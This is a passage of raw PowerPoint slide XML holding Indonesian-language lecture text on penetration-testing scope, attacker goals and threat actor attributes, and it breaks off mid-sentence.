            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkupnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merencanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfokuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengungkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebanyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melaporkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>temuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merekomendasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Bagi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inginkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkisar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengambilalihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemahaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecanggihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>taktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemahaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyeluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>interkoneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfokuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</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179</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1602896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Atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>historis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> statis yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> rootkit, Trojan, botnet, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
